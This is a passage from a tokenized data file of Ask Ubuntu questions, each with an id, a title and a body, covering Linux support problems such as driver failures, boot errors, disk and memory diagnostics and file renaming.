1.0.0 [ 25.876 ] module class : x.org server extension [ 25.876 ] ( ii ) nvidia glx module 310.44 wed mar 27 15:10:55 pdt 2013 [ 25.876 ] ( ii ) loading extension glx [ 25.876 ] ( ii ) loadmodule : `` dri '' [ 25.876 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 25.876 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 25.876 ] compiled for 1.11.3 , module version = 1.0.0 [ 25.876 ] abi class : x.org server extension , version 6.0 [ 25.876 ] ( ii ) loading extension xfree86-dri [ 25.876 ] ( ii ) loadmodule : `` nvidia '' [ 25.991 ] ( ww ) warning , could n't open module nvidia [ 25.991 ] ( ii ) unloadmodule : `` nvidia '' [ 25.991 ] ( ii ) unloading nvidia [ 25.991 ] ( ee ) failed to load module `` nvidia '' ( module does not exist , 0 ) [ 25.991 ] ( == ) matched intel as autoconfigured driver 0 [ 25.991 ] ( == ) matched vesa as autoconfigured driver 1 [ 25.991 ] ( == ) matched fbdev as autoconfigured driver 2 [ 25.991 ] ( == ) assigned the driver to the xf86configlayout [ 25.991 ] ( ii ) loadmodule : `` intel '' [ 25.991 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 25.991 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 25.991 ] compiled for 1.11.3 , module version = 2.21.6 [ 25.991 ] module class : x.org video driver [ 25.991 ] abi class : x.org video driver , version 11.0 [ 25.991 ] ( ii ) loadmodule : `` vesa '' [ 25.992 ] ( ww ) warning , could n't open module vesa [ 25.992 ] ( ii ) unloadmodule : `` vesa '' [ 25.992 ] ( ii ) unloading vesa [ 25.992 ] ( ee ) failed to load module `` vesa '' ( module does not exist , 0 ) [ 25.992 ] ( ii ) loadmodule : `` fbdev '' [ 25.992 ] ( ww ) warning , could n't open module fbdev [ 25.992 ] ( ii ) unloadmodule : `` fbdev '' [ 25.992 ] ( ii ) unloading fbdev [ 25.992 ] ( ee ) failed to load module `` fbdev '' ( module does not exist , 0 ) [ 25.992 ] ( ii ) intel : driver for intel integrated graphics chipsets : i810 , $ udevadm monitor monitor will print the received events for : udev - the event which udev sends out after rule processing kernel - the kernel uevent kernel [ 142.165188 ] add /devices/virtual/net/lo/queues/rx-0 ( queues ) kernel [ 142.165252 ] add /devices/virtual/net/lo/queues/tx-0 ( queues ) udev [ 142.165547 ] add /devices/virtual/net/lo/queues/tx-0 ( queues ) udev [ 142.165571 ] add /devices/virtual/net/lo/queues/rx-0 ( queues ) please help me , i do n't want to get back to windows !
282791	run single application with vnc	i would like to run an application on a remote ubuntu machine using vnc . currently i have to ssh into the remote machine and run x11vnc run vinagre locally start the application in the vinagre vnc window how can i turn this into a single command line operation ? i can combine 1 and 2 into a bash script but how do i do 3 from the command line too ?
282794	batch rename files to lowercase	is there a way to rename all files in a directory to lowercase|uppercase ? i am looking for a oneliner command . i loved totalcommander 's alt+f7 , now i need that functionality in the terminal
282796	hard disk formatting error	so here is the situation.. i installed ubuntu , pretty sweet ... . all was going well till i tried to install an application `` lpcxpresso ide for arm micro controllers '' now the pc hung up as soon as the installation started and after 10 minutes i shut off the pc ( pulled the power cord ) . now when i boot.. i cant get past the boot loader.. i mean if i select my ubuntu installation on the boot loader prompt i just reboot ... now i tried to reinstall ubuntu ... using the same hard disk partition that i used before.. got some kind of an error ( i tried installing from a usb stick ) .. now i am running ubuntu from my usb stick and trying to install it on the same 15gb partition.. i deleted the partition and then created it again but when i create the partition i get this error error creating file system : helper exited with exit code 1 : helper failed with : mke2fs 1.41.14 ( 22-dec-2010 ) ext2fs_check_if_mount : input/output error while determining whether /dev/sda3 is mounted . mkfs.ext4 : input/output error while trying to create journal filesystem label=new volume os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 952848 inodes , 3807405 blocks 190370 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=3900702720 117 block groups 32768 blocks per group , 32768 fragments per group 8144 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 writing inode tables : 0/117 1/117 2/117 3/117 4/117 5/117 6/117 7/117 8/117 9/117 10/117 11/117 12/117 13/117 14/117 15/117 16/117 17/117 18/117 19/117 20/117 21/117 22/117 23/117 24/117 25/117 26/117 27/117 28/117 29/117 30/117 31/117 32/117 33/117 34/117 35/117 36/117 37/117 38/117 39/117 40/117 41/117 42/117 43/117 44/117 45/117 46/117 47/117 48/117 49/117 50/117 51/117 52/117 53/117 54/117 55/117 56/117 57/117 58/117 59/117 60/117 61/117 62/117 63/117 64/117 65/117 66/117 67/117 68/117 69/117 70/117 71/117 72/117 73/117 74/117 75/117 76/117 77/117 78/117 79/117 80/117 81/117 82/117 83/117 84/117 85/117 86/117 87/117 88/117 89/117 90/117 91/117 92/117 93/117 94/117 95/117 96/117 97/117 98/117 99/117100/117101/117102/117103/117104/117105/117106/117107/117108/117109/117110/117111/117112/117113/117114/117115/117116/117done creating journal ( 32768 blocks ) : earlier i ended up with 1.2 or 1.5 mb ext4 partitions when i tried this ... . i 'm new to linux but i am aware of certain linux fundamentals.. so it would be great if the answer is presented accordingly
282802	usb audio interface not recognized on re-docking a thinkpad	my thinkpad x230 is sitting on a lenovo docking station ( minidock plus ) and i have a usb audio interface ( ni komplete audio 6 ) connected to the dock . it works fine when i boot the computer while it is sitting on the docking station . if i dock the thinkpad ( while running or while suspended ) ubuntu 12.10 does not re-connect the usb audio interface . instead it continues to play back audio via the internal sound hardware . the komplete audio 6 is shown in the sound settings but choosing it changes nothing ( the sound is still being played back via the internal hardware ) . i have to re-boot on the dock to get the usb audio running again . any ideas for correcting this behavior ? cheers , thomas
282806	how to enable or disabled a user ?	i 'm uing ubuntu 12.04 desktop . i have 3 users : user1 ( administrator ) , user2 ( standard ) and guest . i wanted to disable user1 and enable user2 which auto logs on with no password but after i did that i ca n't login to user1 and user2 accounts except the guest session user . i 'm striped off every administrative privileges . i 'm very new to ubuntu and i do n't know which options are available to me . how do i enable root or user which is an administrator ? any help is welcomed .
282808	how do i remove a specific line and lines just before and after it ?	i 'm making a summary of the history.log files in /var/log/apt . to that end , i want to remove lines containing a certain pattern as well as the line immediately preceding and the line immediately following the line containing the pattern . in the following example : 1 start-date : 2012-10-18 17:34:12 2 commandline : /usr/sbin/synaptic 3 install : qpdf : i386 ( 3.0.2-1 ) 4 end-date : 2012-10-18 17:34:21 5 start-date : 2012-10-20 16:56:26 6 commandline : apt-get upgrade 7 end-date : 2012-10-20 16:56:39 8 start-date : 2012-10-24 09:15:11 9 commandline : apt-get upgrade 10 end-date : 2012-10-24 09:15:26 11 start-date : 2012-10-26 18:40:20 12 commandline : aptdaemon role='role-install-packages ' sender=':1.196' 13 install : gcolor2 : i386 ( 0.4-2.1ubuntu1 ) 14 end-date : 2012-10-26 18:40:31 15 start-date : 2012-10-27 07:20:03 16 commandline : apt-get upgrade 17 end-date : 2012-10-27 07:20:11 18 start-date : 2012-10-29 16:32:33 19 commandline : /usr/sbin/synaptic 20 install : policykit-desktop-privileges : i386 ( 0.12 ) 21 end-date : 2012-10-29 16:32:40 i want to remove lines 5 , 6 , and 7 , lines 8 , 9 , and 10 and lines 15 , 16 , and 17 . all i can manage is sed -rs ''/apt-get\ upgrade/ , +1 'd ; ' which removes the line containing apt-get upgrade and the line following it .
282811	can i disable activities in kde ?	i 'm running kubuntu and one of the features i 've never found a use for is activities . for the uninitiated , it lets you set up your desktops and applications based on the activity you 're doing ... pretty smart stuff if you need or want it , but i do n't . it currently litters several context menus in and around the desktop and while that is n't causing me physical harm , i 'd prefer it if kde just pretended activities never existed . is there a way to disable activities completely for a user ( or globally ) ?
282812	how to mount ubuntu share on other ubuntu machine ?	i dont know much about ubuntu , i want to mount a ubuntu share on one machine to other ubuntu . mount -t smbfs //windowsmachine/sharefolder /mnt/share -o username=user , password=pass ( smbfs or cifs ) this works for only to mount a windows share on ubuntu . but how to mount a ubuntu share on ubuntu.please help me to solve my problem . thank you in advance
282816	mysql-connector.jar vs mysql-connector.tar	i also have the `` java.lang.classnotfoundexception : com.mysql.jdbc.driver '' in eclipse . i have found many tips and discussions about jdbc in eclipse , however none of them work so far . i keep reading about a jar file while the official website provides only a zip or tar file . does this have anything to do with it ? =============================== what i 've tried so far : sudo apt-get install libmysql-java . http : //dev.mysql.com/downloads/connector/j/ 's tar file , into /usr/lib/jvm/java-6-openjdk/jre/lib/ext i have no idea how to use a classpath . but i copied what i could .
282817	problems with radeon 7640g	i just bought a new laptop with a radeon hd 7640g graphics card , but i 'm having some issues . the biggest problem is that suspend is n't working . after suspend , i just get a black screen . i think that ubuntu is not recognizing the card - lshw -c video produces description : vga compatible controller product : advanced micro devices [ amd ] nee ati vendor : advanced micro devices [ amd ] nee ati physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:51 memory : c0000000-cfffffff ioport : f000 ( size=256 ) memory : ffb00000-ffb3ffff
282819	problem connecting encrypted buffalo external 500gb hard disk in ubuntu 12.04lts	i am having problems connecting my buffalo external 500gb hard disk in ubuntu 12.04 lts . the hdd is password protected and when i connect it on my pc , it just shows up the cd icon on the launcher . it works perfectly with windows xp and windows 7 . ii is preloaded with the password software - utility_hd-pxtu , so whenever i connect it it first asks for the password . but in ubuntu it is showing unable to mount utility_hd-pxtu error mounting : mount : /dev/sr2 already mounted or /media/utility_hd-pxtu busy and when i click on the cd icon it open a folder with some files on it error mounting : mount : block device /dev/sr2 is write-protected , mounting read-only mount : wrong fs type , bad option , bad superblock on /dev/sr2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so
282822	what is the lightest kde i can use on ubuntu ?	default kde is not running good on my pc and it 's too slow . i switched to unity-2d and it 's better . wanted to ask if there is a more simple , lighter kde that would work better on my pc .
282824	where can i find the python tools directory ?	the python2.7 documentation refers to a tools/scripts directory and a tools/demos directory , but those do n't seem to be on my computer . locate tools/scripts does n't find anything . a post on this site said that sudo apt-get source python would download the tools directory , but it did not . have you any other suggestions ?
282831	do i need intel smart response when installing ubuntu ?	with lots of guides and setup variations all over the internet , i find it confusing which is which to really follow . normally , in windows 8 my setup would be install everything in the hdd and use intel smart response for a speedy setup . however as i am new to linux i really do n't know what to do . my ideal setup would be something similar to this , but i know for a fact that irst is not available in linux so what i intend to do is keep the os files in the ssd instead and keep my media on the larger hdd . a step by step procedure would be extremely helpful . edit : i want a system running solely on ubuntu , with the ssd to speed things up but setting it in such a way that it does not hasten its lifespan . # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda1 during installation uuid=80289460-5983-4349-8afc-6f3119938ee9 / ext4 errors=remount-ro 0 1 # /files was on /dev/sdb5 during installation uuid=c1678c88-5100-41bc-8090-7887f1622c7f /files ext4 defaults 0 2 # swap was on /dev/sdb6 during installation uuid=608e3ec2-c76e-4657-af6d-80793b5f50f6 none swap sw 0 0
282835	ubuntu 12.10 segmentation faults , damaged crash reports , random letters changing in files	i have ubuntu 12.10 , on an ssd ( ocz agility 3 128gb ) , with a modestly overclocked i5-2500k ( 4.4ghz ) on motherboard p8z68v_lx . i think there may be a problem with the ssd . its fairly unused , and is currently only 11 % full . running ruby on rails , when things sometimes mysteriously break , its usually because somewhere in the core libraries a letter appears to have changed . for example , in a hash an `` s '' had been changed to a `` { `` , and days later in a spork file the title of a def had changed to `` s { ite '' when it should clearly have been `` suite '' . ubuntu has been experiencing many internal errors and has been unable to report them , thus spawning another error to report that ... and so on . sometimes it complains of incorrect padding . this is n't my main work machine so i 'm eager to experiment on it to find out what it is . smartctl spewed out : > sudo smartctl -a /dev/sda smartctl 5.43 2012-06-30 r3573 [ x86_64-linux-3.5.0-27-generic ] ( local build ) copyright ( c ) 2002-12 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === model family : sandforce driven ssds device model : ocz-agility3 serial number : ocz-822qb5mv0qdi394p lu wwn device id : 5 e83a97 e3d1ecf1a firmware version : 2.15 user capacity : 120,034,123,776 bytes [ 120 gb ] sector size : 512 bytes logical/physical device is : in smartctl database [ for details use : -p show ] ata version is : 8 ata standard is : acs-2 revision 3 local time is : thu apr 18 15:40:12 2013 bst smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x02 ) offline data collection activity was completed without error . auto offline data collection : disabled . self-test execution status : ( 1 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 1465 ) seconds . offline data collection capabilities : ( 0x7f ) smart execute offline immediate . auto offline data collection on/off support . abort offline collection upon new command . offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 1 ) minutes . extended self-test routine recommended polling time : ( 48 ) minutes . conveyance self-test routine recommended polling time : ( 2 ) minutes . sct capabilities : ( 0x0021 ) sct status supported . sct data table supported . smart attributes data structure revision number : 10 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000f 090 090 050 pre-fail always - 0/2566041 5 retired_block_count 0x0033 100 100 003 pre-fail always - 0 9 power_on_hours_and_msec 0x0032 100 100 000 old_age always - 731h+39m+09.960s 12 power_cycle_count 0x0032 100 100 000 old_age always - 256 171 program_fail_count 0x0032 000 000 000 old_age always - 0 172 erase_fail_count 0x0032 000 000 000 old_age always - 0 174 unexpect_power_loss_ct 0x0030 000 000 000 old_age offline - 68 177 wear_range_delta 0x0000 000 000 000 old_age offline - 1 181 program_fail_count 0x0032 000 000 000 old_age always - 0 182 erase_fail_count 0x0032 000 000 000 old_age always - 0 187 reported_uncorrect 0x0032 100 100 000 old_age always - 0 194 temperature_celsius 0x0022 030 030 000 old_age always - 30 ( min/max 30/30 ) 195 ecc_uncorr_error_count 0x001c 120 120 000 old_age offline - 0/2566041 196 reallocated_event_count 0x0033 100 100 003 pre-fail always - 0 201 unc_soft_read_err_rate 0x001c 120 120 000 old_age offline - 0/2566041 204 soft_ecc_correct_rate 0x001c 120 120 000 old_age offline - 0/2566041 230 life_curve_status 0x0013 100 100 000 pre-fail always - 100 231 ssd_life_left 0x0013 100 100 010 pre-fail always - 0 233 sandforce_internal 0x0000 000 000 000 old_age offline - 481 234 sandforce_internal 0x0032 000 000 000 old_age always - 454 241 lifetime_writes_gib 0x0032 000 000 000 old_age always - 454 242 lifetime_reads_gib 0x0032 000 000 000 old_age always - 1025 smart error log not supported smart self-test log not supported smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . update : have run memtest86 , initially it was displaying many errors from second pass , so i restarted and checked the bios voltages , they were all ok. downclocked to normal speed of 3.3ghz , rechecked voltages , all ok. voltages : cpu : 1.096v 3.3v : 3.344v 5v : 5.000v 12v : 12.096v reran memtest86 overnight : time 16:23:23 iterations : 6 adsrmode:64bit pass : 24 errors:65535+ error confidence value : 50 lowest error address : 00180a73000 - 6154.4mb highest error address : 001dffffffc - 7679.9mb bits in error mask : ffffffff bits in error - total : 32 min : 1 max:31 avg:32768 max contiguous errors : 65535+ following the docs on memtest86 , it suggests that a confidence value above 100 suggests certainty of memory problems . given that its only 50 , i 'll swap the ram around and see if its the ram or the motherboard . update2 : i swapped the 2 4gb ram sticks around between a2 and b2 ( that 's how they 're supposed to go in , not a1 and b1 , that would be too intuitive ) ran memtest , 6 passes and nothing happened . overclocked to 4.3ghz , 6 passes and nothing again . perhaps , i did n't seat the ram properly ... update3 : left it running over the weekend , found errors which suggest it may be a problem with the motherboard : time : 61:07:22 iterations:240 adrsmode:64bit pass : 106 errors : 65535+ error confidence value : 77 lowest error address : 001c0027000 - 7168.1mb highest error address : 001dffffffc - 7679.9mb bits in error mask : ffffffff bits in error - total : 32 min : 1 max : 31 avg : 32768 max contiguous errors : 65535+ my best guess is because the address is still high up ( above 4gb after swapping the ram between the used slots ) its a problem with the motherboard . update3 : put ram into slots a1 and b1 . memtest has done 44 passes , no errors . certainly a motherboard problem - one of the slots is bad . i would n't be keen to blame the asus motherboard , it was probably the shipping or my oafish hands .
282841	clementine will not launch	i am running ubuntu 12.04 and clementine would not launch . i removed it , downloaded the most recent version , 1.1.1 , and reinstalled it . it still does not launch . please help . thanks . here is the output from launching clementine from the terminal : 11:15:23.701 debug workerpool:281 starting worker 0xb43feb50 `` /usr/bin/clementine-tagreader '' `` /tmp/clementine_361262713 '' 11:15:23.703 debug workerpool:281 starting worker 0xb43feb50 `` /usr/bin/clementine-tagreader '' `` /tmp/clementine_1330952195 '' 11:15:23.704 error database:595 db error : qsqlerror ( 1 , `` unable to execute statement '' , `` unsupported file format '' ) 11:15:23.704 error database:596 faulty query : `` create table directories ( path text not null , subdirs integer not null ) '' 11:15:23.704 error database:597 bound values : qmap ( ) 11:15:23.705 error unknown unable to update music library database 11:15:23.712 info main:46 tagreader worker connecting to `` /tmp/clementine_361262713 '' 11:15:23.713 info main:46 tagreader worker connecting to `` /tmp/clementine_1330952195 '' aborted ( core dumped )
282842	laptop connecting to wifi , but not internet . only on home wifi , school wifi works fine	just recently installed ubuntu on my vaio vpcs11x9e . the wifi works fine on windows , and wired works fine on both . the wireless also works perfectly with my school 's wifi , but when connecting to my home wifi , i have no internet access . can not ping google.com and iwconfig states `` no wireless extensions '' . thanks
282854	delete files with 2 separators	i would like to be able to search and delete files which have 2 separator `` . '' in their names but all end with .gnucash or .log e.g . pl.293892.gnucash how do i do this please ? normally i would select the files by using *.gnucash but this does n't work . i 've tried `` * . *.gnucash '' but this does n't work either .
282856	an error occurred while mounting /boot/efi	i 'm a new ubuntu user . i have uefi system and after few tries i succeeded to install ( via usb ) , the latest version of ubuntu . now when i 'm trying to boot from grub i get this message : an error occurred while mounting /boot/efi what can i do ?
282859	ubuntu 12.04 with nvidia 304.88 gt 220 not keeping resolution wwhen switching inputs hdmi on hdtv	strange problem since the latest 'upgrade ' for the nvidia drivers ( to 304.88 ) . my htpc - ubuntu 12.04 - is connected to my hdtv via a samsung receiver . this receiver does all the switching for my hdmi connected devices ( ps3 , dvd , satellite box , etc ) . before the nvidia update , i had no problem switching between devices and back to the htpc . however , now when i do this , the resolution on the htpc changes from my preferred setting ( 1360 x 768 ) to `` auto '' ( which is 1920 x 1080 ) . i am running gnome shell 3.4 . i have checked this in unity and xfce and gnome classic , all with the same results . similar problem as this year old question , but i get video - no video on an nvidia geforce gt 440 when switching from another hdmi device
282868	airdroid and kubuntu via hotspot	i would like to connect my samsung galaxy with android using airdroid to my kubuntun 12.04 on a dell 1510 . i do not use a wifi at home , but a g3 sim on my laptop . however i have seen i could create a hotspot and use it to connect with airdroid . i have followed instructions on this site and other to create a hotspot on kubuntu 12.04 . it seems to have worked , but airdroid does n't see the hotspot when scanning . something went wrong down the line . could you provide a step-by-step guide on how to connect airdroid to kubuntu via hotspot ? thanks .
282871	is there a virus active in my ubuntu ?	i m using ubuntu 13.04 . whenever i insert any external memory card or pan drive , a new folder trash is generated there , which uses huge space of it.. the most important thing is that it is not visible in ubuntu . it can be seen in windows though . please tell how to remove this bug .
282873	ubuntu imessage client	are there any chat clients or stand-alone clients that can interact with the imessage server ? i just switched from osx 10.8.x to ubuntu 12.10 , and it 's really the only thing i miss .
282878	surface pro unknown filesystem	all solutions i found depend on a live cd , but my surface wo n't boot into live usb and i ca n't figure out how to access uefi . every time i start my surface , it says error : unknown filesystem . grub rescue > _ how do i get back into windows ? i still have the full windows partition in it ( i think hd0 , gp3 ) , if that helps you with your answer .
282881	how to call php or apache to render a page from the command line ?	i am running apache2 as a web server . i have a local file , example.php , which i need to see as rendered by apache . the easiest way to do this would be to move or link the file to the folder apache exposes as part of my site , and then i could get the page with curl or wget . however , this is not possible in my situation - i can not write to the directory apache is looking in , which means that i ca n't access it by the usual port 80 method . is there a way i can call apache directly , giving it a php file to generate the result of ? i 'm looking for a command like $ apache ./example.php > output.html , is this possible ? i 'm asking about apache , because although i only really need it to run the php , the php-cli is not usable in this cases - apache php and cli php have access to different areas of memory , and i need the results to match the ones returned through apache .
282890	grub fails to boot windows 7 , no such partiton error	my dual-boot windows 7 / ubuntu 12.04 has been working fine for months , but suddenly i 'm unable to boot to windows . i 've tried fixing this using boot-repair ( i.e . purging and reinstalling grub ) , but to no avail . bootinfo is at http : //paste.ubuntu.com/5719132 the specific error i get from grub when attempting to boot windows is : error : no such device 98e09bbae09b9cd6 error : no such partition i 've reviewed many similar posts which appear to have been resolved via boot-repair , but again , i 've run that several times to no effect . any help much appreciated !
282900	how to change boot screen name ?	i want to change the name 'ubuntu 12.04lts ' in boot screen to some other name.how can i do dat ?
282911	can i run my microsoft windows applications on ubuntu ?	i have a hard disk drive ( 160 gb ) full of windows applications and stuff , and i do n't want to lose it . is there possible to use .exe in ubuntu ?
282913	how can i install ubuntu on a dell inspiron 17r 7720 se with windows 8 ?	i recently bought a dell inspiron 17r 7720 special edition but i am unable to install ubuntu 12.10 . wubi does not work for me and i am wondering if there is another way to install it my machine came with windows 8 pre installed .
282915	editing the gtknotebok 's default popup menu	i 'd like to know if it 's possible to append a menu item to the popup menu that appears by default on right-clicking a gtknotebook 's tab page . thanks .
282921	intel hd4000 driver 13.04 : can i calibrate color screen ?	i 've got a new laptop with an ugly blue tint ( very painful for my eyes ) . i can calibrate the screen on windows 8 , this is not perfect , but berable . i hesitate to go with the next ubuntu because i have not a nvidia card . is there a config tool for intel integrated graphic card to calibrate properly color ? redshift or flu.x are not option ( i want a yellowish tint , not a red ) .
282924	ubuntu software center crashes on startup	when i try to open software center it opens but nothing shows up on the window and it closes after 5 seconds . it had worked previously and then i did a ppa purge and then it wo n't open . the ppa i tried to remove was ppa : sunab/kdenlive-release after i purged that ppa the terminal said there was conflict . it offered me a solution ( that i did n't read ) and i accepted it . after it was done software center would n't open software-center here is the output from the terminal 2013-04-18 11:56:47,034 - softwarecenter.ui.gtk3.app - info - setting up proxy 'none' 2013-04-18 11:56:47,050 - softwarecenter.db.database - info - open ( ) database : path=none use_axi=true use_agent=true 2013-04-18 11:56:48,620 - softwarecenter.backend.reviews - warning - could not get usefulness from server , no username in config file 2013-04-18 11:56:49,354 - softwarecenter.ui.gtk3.app - info - show_available_packages : search_text is '' , app is none . 2013-04-18 11:56:50,782 - softwarecenter.db.pkginfo_impl.aptcache - info - aptcache.open ( ) traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 243 , in open self._cache = apt.cache ( gtkmainiterationprogress ( ) ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 102 , in __init__ self.open ( progress ) file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 145 , in open self._cache = apt_pkg.cache ( progress ) systemerror : e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/sunab-kdenlive-release-precise.list , e : the list of sources could not be read. , e : the package lists or status file could not be parsed or opened . 2013-04-18 11:56:54,320 - softwarecenter.db.enquire - error - _get_estimate_nr_apps_and_nr_pkgs failed traceback ( most recent call last ) : file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 115 , in _get_estimate_nr_apps_and_nr_pkgs tmp_matches = enquire.get_mset ( 0 , len ( self.db ) , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' traceback ( most recent call last ) : file `` /usr/bin/software-center '' , line 176 , in app.run ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1422 , in run self.show_available_packages ( args ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/app.py '' , line 1352 , in show_available_packages self.view_manager.set_active_view ( viewpages.available ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/session/viewmanager.py '' , line 154 , in set_active_view view_widget.init_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/panes/availablepane.py '' , line 171 , in init_view self.apps_filter ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 238 , in __init__ self.build ( desktopdir ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 511 , in build self._build_homepage_view ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 271 , in _build_homepage_view self._append_whats_new ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 450 , in _append_whats_new whats_new_cat = self._update_whats_new_content ( ) file `` /usr/share/software-center/softwarecenter/ui/gtk3/views/catview_gtk.py '' , line 439 , in _update_whats_new_content docs = whats_new_cat.get_documents ( self.db ) file `` /usr/share/software-center/softwarecenter/db/categories.py '' , line 124 , in get_documents nonblocking_load=false ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 317 , in set_query self._blocking_perform_search ( ) file `` /usr/share/software-center/softwarecenter/db/enquire.py '' , line 212 , in _blocking_perform_search matches = enquire.get_mset ( 0 , self.limit , none , xfilter ) file `` /usr/share/software-center/softwarecenter/db/appfilter.py '' , line 89 , in __call__ if ( not pkgname in self.cache and file `` /usr/share/software-center/softwarecenter/db/pkginfo_impl/aptcache.py '' , line 263 , in __contains__ return self._cache.__contains__ ( k ) attributeerror : 'nonetype ' object has no attribute '__contains__' i am using 12.04 64 bit
282925	root file system not found in prseed partition	i am using following partition recipe for my partition on ubuntu 12.04 precise . d-i partman-auto/disk string /dev/sda d-i partman-auto/method string lvm d-i partman-lvm/device_remove_lvm boolean true d-i partman-lvm/device_remove_lvm_span boolean true d-i partman-auto/purge_lvm_from_device boolean true d-i partman-md/device_remove_md boolean true d-i partman-lvm/confirm boolean true d-i partman-auto/choose_recipe select boot-root d-i partman-auto/expert_recipe string \ boot-root : : \ 256 500 1024 ext3 \ $ primary { } $ bootable { } \ method { format } format { } \ use_filesystem { } filesystem { ext3 } \ mountpoint { /boot } \ . \ 100 600 100000 ext3 \ $ defaultignore { } \ method { lvm } device { /dev/sda } \ vg_name { system } \ . \ 512 1024 200 % linux-swap \ $ lvmok { } \ in_vg { system } \ lv_name { swap } \ method { swap } format { } \ . \ 2000 3000 4000 ext3 \ $ lvmok { } \ mountpoint { /tmp } \ in_vg { system } \ lv_name { temp } method { format } \ format { } use_filesystem { } filesystem { ext3 } \ . \ 10000 14000 20000 ext3 \ $ lvmok { } \ in_vg { system } \ mountpoint { / } \ lv_name { root } \ method { format } \ format { } use_filesystem { } filesystem { ext3 } \ . \ 5000 6000 10000 ext3 \ $ lvmok { } \ in_vg { system } \ mountpoint { /var } \ lv_name { var } \ method { format } \ format { } use_filesystem { } filesystem { ext3 } \ . \ 5000 6000 10000 ext3 \ $ lvmok { } \ in_vg { system } \ mountpoint { /home } \ lv_name { home } \ method { format } \ format { } use_filesystem { } filesystem { ext3 } \ . \ 10000 15000 100000 ext3 \ $ lvmok { } \ in_vg { system } \ mountpoint { /usr } \ lv_name { usr } \ method { format } \ format { } use_filesystem { } filesystem { ext3 } \ . \ d-i partman/confirm_write_new_label boolean true d-i partman/choose_partition select finish d-i partman/confirm boolean true
282931	how to configure glidepoint driver for touchpad ?	after using the hack described in : alps touchpad on dell : how do i install the dkms driver to enable multitouch ? , i 'm able to get somewhat functional touchpad for a laptop dell latititude e6430 using the glidepoint driver . however , the two finger scroll is somewhat fizzy and definitely not as smooth as in windows 7 . i would be willing to have a try at fine tuning the configuration files ( speed of two finger scroll , pressure , that kind of things ) to see if i can make it better , but i ca n't figure out where they are . the xinput list relevant output is : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ glidepoint virtual touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] and the synclient -l output is : could n't find synaptics properties . no synaptics driver loaded ? the synclient package xserver-xorg-input-synaptics 1.6.2-1ubuntu6 is installed , but apparently does n't figure out that the glidepoint driver is somewhat of a synaptik-like touchpad that one could whish to configure in a similar way . the glidepoint package i installed from the previously mentionned link does have a reasonnably nice gui config tool , but the only available option for two finger scroll is activate or does n't activate . likewise , the mouse and touchpad system configuration options does n't give me any tuning related to a touchpad , let alone a multipoint touchpad . does someone know how to fine tune the glidepoint driver ? there is a /etc/glidepoint/configure file which looks like : target_scancode = 0x4 , 0x4 , 0x9e ; event_type , event_code , event_value ref_scancode = 0x1 , 0xbf ; event_type , event_code target_scancode_times = 1 ; support 0 , 1 or 2 but nothing really obvious here . i did also locate a ~/.gconf/apps/glidepoint/preferences/alps_t3_touchpa/ % gconf.xml file which has an entry : entry name= '' twofinger '' mtime= '' 1365632937 '' type= '' int '' value= '' 1 '' / which looks like it is storing the enabling status of the two finger scrolling configuration but no fine tuning here as far as i can tell . note that i 'm using ubuntu 13.04 with standard unity , although i do n't see why a non beta distribution would make a difference here ( the same happens with ubuntu 12.04 ) thank you for your answer !
